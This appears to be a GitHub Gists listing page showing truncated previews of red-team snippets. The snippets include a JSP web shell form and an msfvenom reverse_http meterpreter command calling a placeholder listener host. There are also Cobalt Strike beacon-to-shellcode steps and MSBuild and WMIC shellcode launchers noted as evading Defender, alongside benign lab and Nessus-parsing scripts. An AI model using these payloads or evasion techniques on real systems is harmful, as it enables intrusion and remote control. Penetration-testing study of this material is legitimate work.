This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket | |
import sys | |
import os | |
host = 'TARGET IP ADDRESS HERE' | |
port = 4555 | |
try: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This script can be used to extract a list of HTTP servers from .nessus files. | |
# Original Author: Scott Sutherland, NetSPI 2017 | |
# Modified by KM 11/2018 to extract a list of all HTTP servers, not just IIS6 | |
# Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional. | |
# Create an output table | |
$outputtbl =New-Object System.Data.DataTable | |
$outputtbl.Columns.Add("IpAddress") | Out-Null | |
$outputtbl.Columns.Add("WebServerVersion") | Out-Null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Another gem from Joaquim Nogueira (@lkys37en) | |
#!/bin/bash | |
#Reference:https://www.valuebound.com/resources/blog/Installing-drupal-with-drush-the-basics | |
#Reference:https://websiteforstudents.com/install-drupal-cms-on-ubuntu-16-04-lts-with-apache2-mariadb-php-7-1-and-lets-encrypt-ssl-tls/ | |
print_usage() { | |
echo "" | |
echo "Usage: $0 -v drupal-8.5.0 -p Welcome1" | |
echo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
param( | |
[Parameter(Mandatory)] | |
[string]$Path | |
) | |
#Created by Pierre.Audonnet@microsoft.com | |
# | |
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt | |
# | |
# keytab { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form method="GET" action=""> | |
<input type="text" name="cmd" /> | |
<input type="submit" value="Exec!" /> | |
</form> <%! | |
public String esc(String str){ | |
StringBuffer sb = new StringBuffer(); | |
for(char c : str.toCharArray()) | |
if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) | |
sb.append( c ); | |
else |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Take a stageless CS Beacon raw payload and convert to shellcode in the '\xAA\xBB...' format | |
# Attacks > Packages > Windows Executable (S) > Raw. Save as beacon.bin | |
# hexdump -v -e '"\\x" 1/1 "%02X"' ./beacon.bin | |
// Take any raw shellcode file and get the hex from it in the 'fe9820fa...' format | |
# xxd -p -c 100000000000000000 ./payload.bin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj | |
Example to create a CS beacon stager, base64-encoded to insert into "strShellCode" variable below | |
msfvenom -p windows/meterpeter/reverse_http LHOST=1.1.1.1 LPORT=443 -f raw -o /tmp/payload.bin && base64 -w0 /tmp/payload.bin | |
Then execute this on target with "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe .\msbuild-shellcode.xml" | |
Defender doesn't flag on this (as of 5/30/19) | |
*/ | |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="[TARGETNAME]"> | |
<ClassExample /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created by Joaquim Nogueira (@lkys37en), March 2019. I take no credit for this awesome work :) | |
#!/bin/bash | |
print_usage() { | |
echo "" | |
echo "A huge thank you to Brax from proslackers for helping me with this script, thank you!" | |
echo "" | |
echo "Usage: $0 -d lkylabs.com -u Administrator -p Welcome1! -o OU=Linux-Servers,OU=Servers,OU=Computers,OU=lkylabs,DC=lkylabs,DC=com -s 'lkylabs\\domain^admins lkylabs\\linux^admins' -x 'lkylabs\\domain^admins'" | |
echo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj | |
// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs | |
// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs | |
// Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll | |
// mylauncher.js can be put into something like a WMIC XSL template like so... | |
/* | |
// wmic-template.xsl | |
// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/zsh | |
# Turn off auto suggestions | |
rm /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh | |
# Turn off syntax highlighting | |
rm /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh | |
# Reload terminal |
OlderNewer